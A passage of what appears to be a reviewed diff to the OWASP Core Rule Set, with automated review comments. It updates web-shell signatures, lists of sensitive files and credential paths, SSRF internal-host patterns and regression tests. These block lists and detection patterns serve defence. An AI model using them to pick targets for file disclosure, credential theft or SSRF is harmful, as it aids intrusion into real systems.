\n\nRu24PostWebShell " \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -388,7 +388,7 @@ SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King\r\n\r\n\n\n\n\ng00nshell v[0-9.]+ " \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -450,7 +450,7 @@ SecRule RESPONSE_BODY "@contains <title>punkholicshell" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -470,7 +470,7 @@ SecRule RESPONSE_BODY "@rx ^\n \n azrail [0- tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -490,7 +490,7 @@ SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -510,7 +510,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<title>[^~]*~ Shell I\n\n:: b374k m1n1 [0-9.]+ :: tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -550,14 +550,14 @@ SecRule RESPONSE_BODY "@pmFromFile web-shells-asp.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -579,13 +579,13 @@ SecRule RESPONSE_BODY "@contains

webadmin.php

0) {v1 = NF-1; v2 = NF} else {v1 = NF-2; v2 = NF-1} print tolower($v1"/"$v2) }) }' | grep apache | sort | uniq apache/access.conf
@@ -387,6 +440,7 @@ etc/adduser.conf
 etc/alias
 etc/alsa
 etc/alternatives
+etc/amavis
 etc/anacrontab
 etc/ansible
 etc/apache/access.conf
@@ -402,9 +456,10 @@ etc/apt
 etc/asciidoc
 etc/at.allow
 etc/at.deny
+etc/audit
 etc/avahi
-etc/bash_completion.d
 etc/bash.bashrc
+etc/bash_completion.d
 etc/bashrc
 etc/bind
 etc/binfmt.d
@@ -412,6 +467,7 @@ etc/bluetooth
 etc/bonobo-activation
 etc/bootptab
 etc/brltty
+etc/byobu
 etc/ca-certificates
 etc/calendar
 etc/casper.conf
@@ -432,7 +488,9 @@ etc/cron.d
 etc/cron.hourly
 etc/cron.monthly
 etc/cron.weekly
+etc/cron.yearly
 etc/crontab
+etc/crowdsec
 etc/crypttab
 etc/cups
 etc/cvs-cron.conf
@@ -449,7 +507,9 @@ etc/dictionaries-common
 etc/dkms
 etc/dns2tcpd.conf
 etc/dnsmasq.d
+etc/docker
 etc/dockeretc/dpkg
+etc/dovecot
 etc/e2fsck.conf
 etc/elasticsearch
 etc/emacs
@@ -479,6 +539,7 @@ etc/gdm3
 etc/geoclue
 etc/ghostscript
 etc/gimp
+etc/gitlab
 etc/glvnd
 etc/gnome
 etc/gnucash
@@ -515,6 +576,7 @@ etc/kernel
 etc/kibana
 etc/ld.so.conf
 etc/ldap
+etc/letsencrypt
 etc/libblockdev
 etc/libibverbs.d
 etc/libnl-3
@@ -527,6 +589,7 @@ etc/login.defs
 etc/logrotate.conf
 etc/logrotate.d
 etc/logstash
+etc/logwatch
 etc/lsb-release
 etc/ltrace.conf
 etc/lvm
@@ -563,12 +626,15 @@ etc/networkmanager
 etc/newsyslog.conf
 etc/newt
 etc/nghttpx
-etc/nginx/
+etc/nginx
 etc/nikto
 etc/npasswd
+etc/nsswitch.conf
 etc/nuxeo.conf
 etc/odbcdatasources
 etc/openal
+etc/opendkim
+etc/opendmarc
 etc/openldap/ldap.conf
 etc/openmpi
 etc/opt
@@ -598,6 +664,7 @@ etc/pulse
 etc/pure-ftpd
 etc/pureftpd
 etc/python
+etc/qemu
 etc/rc.conf
 etc/rc.d/rc.httpd
 etc/rc0.d
@@ -631,6 +698,7 @@ etc/smb.conf
 etc/smbpasswd
 etc/smi.conf
 etc/snmp
+etc/sogo
 etc/sound
 etc/spamassassin
 etc/speech-dispatcher
@@ -669,6 +737,7 @@ etc/ubuntu-advantage
 etc/udev
 etc/udisks2
 etc/ufw
+etc/unbound
 etc/update-manager
 etc/update-motd.d
 etc/update-notifier
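Review bot: The context line `etc/dockeretc/dpkg` in the hunk at `@@ -449,7 +507,9 @@` is a single entry in the file (the hunk's seven-line old count only works if it is one line, so this is not a rendering artifact of this page) and looks like `etc/docker` and `etc/dpkg` fused together; as a substring pattern it only matches a path containing that exact run, so `etc/dpkg` has effectively had no coverage. The commit adds `etc/docker` directly above it but leaves the fused line in place, so the same hunk should turn it into `etc/dpkg`, the `etc/docker` half being the line just added. The file header for this section is outside this chunk; I am inferring it is lfi-os-files.data from the `keep in sync with lfi-os-files.data` comments further down.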
@@ -693,12 +762,15 @@ etc/wu-ftpd
 etc/x11
 etc/xdg
 etc/xml
+gitlab.rb
+gitlab_config_
 gruntfile.js
 home/postgres
 http/httpd.conf
 httpd/conf/httpd.conf
 includes/configure.php
 inetpub/wwwroot/global.asa
+initial_root_password
 jakarta/dist/tomcat
 jakarta/tomcat/conf
 jakarta/tomcat/logs
@@ -745,6 +817,7 @@ php5/apache.conf
 php5/apache2.conf
 php5/httpd.conf
 postgresql/log/
+/proc/
 proc/0
 proc/1
 proc/2
@@ -837,10 +910,12 @@ server/default/conf
 server/default/deploy
 server/default/log
 services.yml
+sftp.json
 sites/default/default.settings.php
 sites/default/settings.local.php
 sites/default/settings.php
 squirrelmail/www
+/sys/
 sys/block
 sys/bus
 sys/class
@@ -903,9 +978,7 @@ var/saf/_log
 var/saf/port/log
 var/spool
 var/webmin
-var/www/conf
-var/www/html/squirrelmail
-var/www/log
+var/www
 volumes/macintosh_hd
 volumes/webbackup
 wamp/bin/apache
@@ -922,6 +995,7 @@ windows/setupact.log
 windows/setupapi.log
 windows/setuperr.log
 windows/system32
+windows/syswow64
 windows/updspapi.log
 windows/windowsupdate.log
 windows/wmsetup.log
diff --git a/rules/php-function-names-933150.data b/rules/php-function-names-933150.data
index adc6afc2b0..c4b2573f6a 100644
--- a/rules/php-function-names-933150.data
+++ b/rules/php-function-names-933150.data
@@ -98,7 +98,6 @@ imagegd2
 ini_get
 ini_get_all
 ini_set
-intval
 iptcembed
 is_array
 is_dir
@@ -149,7 +148,6 @@ pg_prepare
 pg_query
 php_strip_whitespace
 php_uname
-phpinfo
 phpversion
 posix_getegid
 posix_geteuid
@@ -231,7 +229,6 @@ strtoupper
 uasort
 ucfirst
 uksort
-unserialize
 urldecode
 urlencode
 var_dump
diff --git a/rules/restricted-files.data b/rules/restricted-files.data
index 94a406dd0a..af77bfcaec 100644
--- a/rules/restricted-files.data
+++ b/rules/restricted-files.data
@@ -6,6 +6,7 @@
 # home level dotfiles (keep in sync with lfi-os-files.data).
 # Also include commented values (e.g., `# .env`), but not comments.
 # grep -E "^(#\s*)?\.\S+$" lfi-os-files.data | sed 's/^#\s*//'
+.access/
 .addressbook
 .anydesk/
 .aptitude/config
@@ -15,20 +16,28 @@
 .bash_
 .bashrc
 .boto
+.cache/
 .cache/notify-osd.log
 .cargo/
+.config.local.php
 .config/
+.coverage
+.coveralls.yml
+.credentials
 .cshrc
 .cups/
+.cvs
 .dbus/
 .deployment-secrets.txt
 .docker/
+.dockerignore
 .drush/
 .env
 .envrc
 .eslintignore
 .fbcindex
 .forward
+.ftpconfig
 .gem/
 .git/
 .gitattributes
@@ -44,10 +53,12 @@
 .gsutil/
 .hg/
 .hgignore
+.history
 .hplip/hplip.conf
 .htaccess
 .htdigest
 .htpasswd
+.ipynb_checkpoints/
 .java/
 .ksh_history
 .kube/
@@ -62,7 +73,9 @@
 .local/state/
 .lynx_cookies
 .minikube/
+.msmtprc
 .my.cnf
+.myscmserverinfo
 .mysql_history
 .nano_history
 .netrc
@@ -73,6 +86,9 @@
 .nsr
 .nvm/
 .oh-my-
+.pac
+.pass
+.passwd
 .password-store
 .pearrc
 .pgpass
@@ -83,23 +99,32 @@
 .procmailrc
 .profile
 .psql_history
+.pwd
+.pytest_cache/
 .python_history
 .rediscli_history
+.remote-sync.json
 .rhistory
 .rhosts
 .rustup
+.s3cfg
+.secrets
 .selected_editor
+.settings/
 .sh_history
-.sqlite_history
 .snap/
+.sqlite_history
 .ssh/
 .subversion/
 .svn/
 .svnignore
 .tconn/
 .tcshrc
-.tmux.conf
+.terraform.lock.hcl
+.terraform/
 .thunderbird/
+.tmux.conf
+.tools/
 .tor/
 .travis.yaml
 .travis.yml
@@ -108,16 +133,17 @@
 .vim/
 .viminfo
 .vimrc
-.vscode
 .vmware/
+.vscode
+.web.config.swp
 .wget-hsts
 .www_acl
 .wwwacl
 .xauthority
 .yarnrc
-.zshenv
 .zhistory
 .zsh_history
+.zshenv
 .zshrc
 # Generic config filenames and common permutations
@@ -277,6 +303,11 @@ config_sample.yml
 config_test.yml
 config-test.yml
 config.test.yml
+config.sample.inc.php
+credentials.json
+secrets.json
+secrets.yaml
+secrets.yml
 # Compressed database dumps
 .sql.001
 .sql.7z
@@ -310,6 +341,10 @@ config.test.yml
 .sql.xz
 .sql.yz1
 .sql.z
+# GitLab Omnibus
+gitlab.rb
+gitlab_config_
+initial_root_password
 # AWS cli
 aws.yaml
 aws.yml
@@ -318,6 +353,9 @@ aws-key.yml
 # October CMS credentials file
 /auth.json
 # Wordpress
+/debug.log
+/error.log
+/errors.log
 wp-config.
 wp-config-
 wp-config_
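Review bot: `.pass`, added in the hunk at `@@ -73,6 +86,9 @@`, is a substring of `.passwd` (added right below it) and of the existing `.password-store`, so if this file is still consumed through `@pmFromFile`, which matches substrings, those two entries are redundant with it and `.pass` will also hit any request path containing `.pass` for other reasons; pick one level of specificity and keep only that. `.cache/` in the first hunk likewise subsumes the existing `.cache/notify-osd.log` two lines below it. `.pac` reads like a truncation on its own and deserves a comment naming what it targets, presumably proxy auto-config files, e.g. `# proxy auto-config files (*.pac)` — confirm the intent before wording it.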
@@ -413,6 +451,28 @@ compose.yml
 compose.yaml
 # CVE-2023-49103
 phpinfo.php
+# Python cache
+__pycache__/
+# Windows system ini files
+boot.ini
+system.ini
+win.ini
+# NodeJS log file
+pm2.log
+# Generic log filename
+debug.log
+# Mysql/MariaDB config file
+debian.cnf
+my.cnf
+mysql.cnf
+mysqldump.cnf
+# FTP config files
+ftp-sync.json
+# Yarn log files
+yarn-debug.log
+yarn-error.log
+# Code coverage config file
+coverage.xml
 # /proc entries (keep in sync with lfi-os-files.data)
 # grep -E "^proc/" lfi-os-files.data
@@ -496,6 +556,9 @@ proc/version_signature
 proc/vmallocinfo
 proc/vmstat
 proc/zoneinfo
+/proc/
+
+sftp.json
 # /sys entries (keep in sync with lfi-os-files.data)
 # grep -E "^sys/" lfi-os-files.data
@@ -510,3 +573,9 @@ sys/hypervisor
 sys/kernel
 sys/module
 sys/power
+/sys/
+
+# Vite.js development server endpoints (CVE-2025-30208)
+# These endpoints allow arbitrary file system access and should never be exposed
+/@fs/
+/@id/
diff --git a/rules/restricted-upload.data b/rules/restricted-upload.data
index 7ad5df7abe..897370e11e 100644
--- a/rules/restricted-upload.data
+++ b/rules/restricted-upload.data
@@ -14,14 +14,22 @@
 # }' rules/restricted-files.data | sort | uniq > "$tmpfile"
 # crs-toolchain util fp-finder "$tmpfile" -e english-extended.txt >> rules/restricted-upload.data
 # rm -f "$tmpfile" english-extended.txt
+.DS_Store
+.access/
 .addressbook
 .bash_
 .bashrc
 .boto
 .bowerrc
+.cache/
+.config.local.php
+.coverage
+.coveralls.yml
+.credentials
 .cshrc
+.cvs
 .deployment-secrets.txt
-.DS_Store
+.dockerignore
 .env
 .envrc
 .eslintignore
@@ -29,6 +37,7 @@
 .fbcindex
 .fish
 .forward
+.ftpconfig
 .gitattributes
 .gitconfig
 .gitignore
@@ -37,10 +46,12 @@
 .gitmodules
 .google_authenticator
 .hgignore
+.history
 .htaccess
 .htdigest
 .htpasswd
 .idea
+.ipynb_checkpoints/
 .jshintrc
 .ksh_history
 .lesshst
@@ -48,7 +59,9 @@
 .lighttpdpassword
 .lldb-history
 .lynx_cookies
+.msmtprc
 .my.cnf
+.myscmserverinfo
 .mysql_history
 .nano_history
 .netrc
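Review bot: `sftp.json` is placed between the `/proc` and `/sys` blocks in the hunk at `@@ -496,6 +556,9 @@`, which the file's own comments say are produced with `grep -E "^proc/" lfi-os-files.data` and `grep -E "^sys/" lfi-os-files.data`; it belongs under the `# FTP config files` heading added in the previous hunk, next to `ftp-sync.json`. The new `/proc/` and `/sys/` lines have a related problem: with a leading slash they do not match those grep patterns, so regenerating the blocks from the documented commands would drop them unless the comments are updated to mention them. `debug.log` under `# Generic log filename` also makes the `/debug.log` added under `# Wordpress` in the previous chunk redundant, assuming substring matching via `@pmFromFile`.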
@@ -57,6 +70,9 @@ .nsconfig .nsr .oh-my- +.pac +.pass +.passwd .password-store .pearrc .pgpass @@ -69,11 +85,17 @@ .procmailrc .profile .psql_history +.pwd +.pytest_cache/ .python_history .rediscli_history +.remote-sync.json .rhistory .rhosts +.s3cfg +.secrets .selected_editor +.settings/ .sh_history .sql.001 .sql.7z @@ -110,13 +132,17 @@ .sqlite_history .svnignore .tcshrc +.terraform.lock.hcl +.terraform/ .tmux.conf +.tools/ .travis.yaml .travis.yml .user.ini .viminfo .vimrc .vscode +.web.config.swp .wget-hsts .ws_ftp.ini .www_acl @@ -127,6 +153,12 @@ .zsh_history .zshenv .zshrc +BlockCypher.log + + + + +__pycache__/ acpi asound auth.json @@ -134,7 +166,7 @@ aws-key.yaml aws-key.yml aws.yaml aws.yml -BlockCypher.log +boot.ini bootconfig bower.json buddyinfo @@ -226,6 +258,7 @@ config.prod.yml config.py config.rb config.sample.asp +config.sample.inc.php config.sample.ini config.sample.json config.sample.php @@ -302,9 +335,13 @@ config_test.txt config_test.xml config_test.yaml config_test.yml +coverage.xml cpuinfo +credentials.json database.yaml database.yml +debian.cnf +debug.log default.settings.php defaults.inc.php Desktop.ini @@ -315,9 +352,13 @@ env.php execdomains filesystems fish_variables +ftp-sync.json +gitlab.rb +gitlab_config_ gruntfile.js hplip.conf hypervisor +initial_root_password iomem ioports ipmi @@ -335,6 +376,9 @@ local.xml mdstat meminfo mtrr +my.cnf +mysql.cnf +mysqldump.cnf notify-osd.log npm-debug.log npm-shrinkwrap.json @@ -350,21 +394,26 @@ php_errors.log phpcs.xml phpcs.xml.dist phpinfo.php +pm2.log routing.yml sched_debug schedstat scsi secrets.json +secrets.yaml +secrets.yml security.yml sendgrid.env services.yml settings.inc.php settings.local.php settings.php +sftp.json slabinfo softirqs sslvpn_websession sysrq-trigger +system.ini sysvipc thread-self Thumbs.db @@ -377,8 +426,11 @@ vmstat Web.config weblogic.xml webpack.config.js +win.ini wp-config- wp-config. wp-config_ +yarn-debug.log +yarn-error.log yarn.lock zoneinfo 
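Review bot: The `@@ -127,6 +153,12 @@` hunk adds four empty lines between `BlockCypher.log` and `__pycache__/`. The header comment describes this file as the output of `sort | uniq`, which never emits blank lines, so these look like an editing artifact; please remove them and, since the consuming matcher is not visible here, confirm that an empty pattern cannot become a match-everything entry. The relocation of `.DS_Store` and `BlockCypher.log` restores byte-order sorting and is consistent with that recipe.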
diff --git a/rules/scanners-user-agents.data b/rules/scanners-user-agents.data index 91a3938238..4f9ddf2d03 100644 --- a/rules/scanners-user-agents.data +++ b/rules/scanners-user-agents.data @@ -61,6 +61,9 @@ morfeus # https://trunc.org/learning/the-mozlila-user-agent-bot Mozlila +# Typo of Mozilla/5.0 user-agent +Mozilla/5.g + # Nessus # http://www.tenable.com/products/nessus-vulnerability-scanner nessus diff --git a/rules/ssrf-no-scheme.data b/rules/ssrf-no-scheme.data new file mode 100644 index 0000000000..d1bb9e2da8 --- /dev/null +++ b/rules/ssrf-no-scheme.data @@ -0,0 +1,35 @@ +# SSRF patterns without schemes +# +# This file contains localhost and internal DNS names that are commonly used +# in SSRF attacks. These patterns are checked without URI schemes to catch +# cases where frameworks automatically prepend 'http://' or 'https://'. +# +# Sources: +# - https://gist.githubusercontent.com/jhaddix/78cece26c91c6263653f31ba453e273b/raw/a4869d58a5ce337d1465c2d1b29777b9eecd371f/cloud_metadata.txt +# - https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +# - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery +# - https://github.com/assetnote/blind-ssrf-chains +# - https://github.com/coreruleset/coreruleset/issues/4427 + +# Standard hosts aliases +localhost/ +localhost.localdomain/ +localhost4/ +localhost4.localdomain4/ +ipv6-localhost/ +ip6-loopback/ + +# Docker based aliases +host.docker.internal/ +gateway.docker.internal/ +kubernetes.docker.internal/ + +# Podman +host.containers.internal/ + +# K8s API local service +kubernetes.default.svc.cluster.local/ + +# Testing services +localtest.me/ +lvh.me/ diff --git a/rules/ssrf.data b/rules/ssrf.data index ab1048900e..d37b969972 100644 --- a/rules/ssrf.data +++ b/rules/ssrf.data @@ -53,6 +53,7 @@ http://[0:0:0:0:0:ffff:127.0.0.1] http://0/ http://127.1 http://127.0.1 +http:127.0.0.1 # AWS ECS http://169.254.170.2/v2 
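Review bot: Every entry in the new `rules/ssrf-no-scheme.data` ends in `/`, so a target such as `localhost:8080` or a bare `host.docker.internal` with no path will not match; if that is a deliberate false-positive trade-off (the word `localhost` is common in ordinary text), the header comment should say so, e.g. `# Entries end in '/' on purpose: a bare hostname without a path is too noisy to flag.` The loopback alias set is also incomplete relative to a stock Debian/Ubuntu `/etc/hosts`, which defines `ip6-localhost` next to `ip6-loopback`; adding `ip6-localhost/` keeps the list consistent with the `localhost`/`localhost4` pairing above it. The `Mozilla/5.g` and `http:127.0.0.1` additions on this line are fine.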
diff --git a/rules/unix-shell.data b/rules/unix-shell.data index 499dba3469..6de8f5c77a 100644 --- a/rules/unix-shell.data +++ b/rules/unix-shell.data @@ -586,6 +586,7 @@ bin/touch bin/traceroute bin/traceroute6 bin/troff +bin/trap bin/tshark bin/ul bin/ulimit diff --git a/tests/TESTS_EXCLUSIONS b/tests/TESTS_EXCLUSIONS index e0ec0d9648..9cc47c7161 100644 --- a/tests/TESTS_EXCLUSIONS +++ b/tests/TESTS_EXCLUSIONS @@ -1,3 +1,13 @@ +# This file defines rules that are expected to fail the "rules without tests" lint check. +# These are mainly administrative rules. +# +# Lines starting with `#` are considered comments. +# Every non-empty, non-commented line is expected to be a rule number (e.g. 123456) or +# rule number prefix (e.g., 1234, or 12). Prefixes will match all rules IDs with the same prefix. +# The linter will skip the "rules without tests" lint check for any matching rule ID. +# +# See https://github.com/coreruleset/crs-linter for reference. + # crs-setup.conf.example 1234 900 @@ -8,6 +18,9 @@ 949 # 921170 prepares 921180 921170 +# 922140 and 922150 prepares 922110 +922140 +922150 # 942441 is an exclusion rule 942441 # 942442 is an exclusion rule diff --git a/tests/docker-compose.yml b/tests/docker-compose.yml index 9675f265cb..9b2ad8b1c1 100644 --- a/tests/docker-compose.yml +++ b/tests/docker-compose.yml @@ -36,7 +36,7 @@ x-nginx-env: &nginx-env services: modsec2-apache: &apache container_name: modsec2-apache - image: owasp/modsecurity-crs:apache@sha256:f2523fbe1bc500399901f5e18ddd1b3cf1a653d7bfae4f12e80a077f3256dee5 + image: owasp/modsecurity-crs:apache@sha256:fc147eb3e1ab626b0c693222d87005f6cf647cea58613b47e360c18943fed35f # NOTE: The user used to run the container process is explicitly set to # 'root'. This fixes issues with permissions on the logging directories used 
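Review bot: The explanatory header added to `tests/TESTS_EXCLUSIONS` has two wording slips: `rules IDs` should be `rule IDs`, and the two example markers are inconsistent (`e.g. 123456` versus `e.g., 1234`). The comment on the new exclusions, `# 922140 and 922150 prepares 922110`, has a plural subject and should read `prepare`. Minor, but this file is now the documentation for the lint check, so it is worth getting right.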
@@ -66,7 +66,7 @@ services: modsec3-nginx: &nginx container_name: modsec3-nginx - image: owasp/modsecurity-crs:nginx@sha256:f7d39903fca30e5af4c741929de2c276e19bc63c91669ab8466c20a36dc9d9bd + image: owasp/modsecurity-crs:nginx@sha256:eb7fa46bea1fa2e2d83793058cea4152ca0895cf6ad15d52a6ebe7f26bef900c # NOTE: The user used to run the container process is explicitly set to # 'root'. This fixes issues with permissions on the logging directories used # as bind mounts. This is done as *a convenience for running the CRS testing diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index ea1805173c..30a31a8274 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -94,6 +94,9 @@ test_overrides: output: log: no_expect_ids: [933110] + - rule_id: 933220 + test_ids: [2, 4] + reason: "Nginx ignore by default request header with invalid characters (like X_Filename or X.Filename)" - rule_id: 934131 test_ids: [5] reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml index 86df272810..e557ef8acc 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml @@ -40,20 +40,3 @@ tests: output: log: expect_ids: [920190] - - test_id: 3 - desc: "Status Page Test - Request-Range header field with range end less than range start" - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Request-Range: bytes=64-0 - uri: "/" - version: "HTTP/1.1" - output: - log: - expect_ids: [920190] 
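Review bot: The `reason` on the new 933220 override in `nginx-overrides.yaml` is hard to parse as written; suggest `reason: "nginx drops request headers with invalid characters by default (ignore_invalid_headers on, underscores_in_headers off), so names like X_Filename or X.Filename never reach the rule"`. Naming the directives tells the next maintainer exactly which nginx setting would make tests 2 and 4 meaningful on that platform. The image digest bump in `tests/docker-compose.yml` above it needs no review.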
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml index dc322f3866..59a23c9a61 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml @@ -18,23 +18,7 @@ tests: output: log: expect_ids: [920200] - - # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php - test_id: 2 - stages: - - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log: - expect_ids: [920200] - - test_id: 3 + - test_id: 2 stages: - input: dest_addr: "127.0.0.1" @@ -49,7 +33,7 @@ tests: output: log: no_expect_ids: [920200] - - test_id: 4 + - test_id: 3 stages: - input: dest_addr: "127.0.0.1" @@ -64,7 +48,7 @@ tests: output: log: expect_ids: [920200] - - test_id: 5 + - test_id: 4 stages: - input: dest_addr: "127.0.0.1" @@ -79,7 +63,7 @@ tests: output: log: expect_ids: [920200] - - test_id: 6 + - test_id: 5 desc: 'Range: Too many fields (920200) from old modsec regressions' stages: - input: @@ -100,7 +84,7 @@ tests: output: log: expect_ids: [920200] - - test_id: 7 + - test_id: 6 desc: This should PASS (PL2) stages: - input: @@ -117,7 +101,7 @@ tests: output: log: no_expect_ids: [920200] - - test_id: 8 + - test_id: 7 desc: "This should FAIL with rule 920200 (PL2)" stages: - input: @@ -134,7 +118,7 @@ tests: output: log: expect_ids: [920200] - - test_id: 9 + - test_id: 8 desc: This should PASS (PL2) stages: - input: 
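Review bot: Removing test 2 from `920200.yaml` and renumbering tests 3–10 down by one changes the identity of every remaining case; anything that refers to them by number — platform override files such as `nginx-overrides.yaml`, which select tests with `rule_id`/`test_ids`, or issue links — will now point at the wrong case. None of the override hunks on this page mention 920200, but please grep the overrides for `rule_id: 920200` before merging. Leaving a gap in the ids instead of renumbering avoids this class of drift. The removed Request-Range case appears to be covered by the new 920660 file later in the diff.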
@@ -151,7 +135,7 @@ tests: output: log: no_expect_ids: [920200] - - test_id: 10 + - test_id: 9 desc: This should PASS (PL2) stages: - input: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml index 416a7774ff..7fbc42b899 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml @@ -408,3 +408,39 @@ tests: output: log: expect_ids: [920420] + - test_id: 21 + desc: "Positive test: Ensure that the content type application/csp-report is not allowed by the default configuration" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: application/csp-report + method: POST + port: 80 + uri: "/" + data: '{"foo":"bar"}' + version: HTTP/1.1 + output: + log: + expect_ids: [920420] + - test_id: 22 + desc: "Positive test: Ensure that the content type application/reports+json is not allowed by the default configuration" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: application/reports+json + method: POST + port: 80 + uri: "/" + data: '{"foo":"bar"}' + version: HTTP/1.1 + output: + log: + expect_ids: [920420] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920640.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920640.yaml new file mode 100644 index 0000000000..47389347ca --- /dev/null +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920640.yaml 
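Review bot: Tests 21 and 22 in `920420.yaml` only show that `application/csp-report` and `application/reports+json` are rejected by the default allowlist; if the motivation is that operators may legitimately run browser reporting endpoints, a negative counterpart that adds those types via `tx.allowed_request_content_type` would document the supported way to allow them. Style-wise these two tests use unquoted `dest_addr: 127.0.0.1` and `version: HTTP/1.1` while the sibling files in this diff quote both; harmless to the YAML parser, but worth aligning with the file's existing entries.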
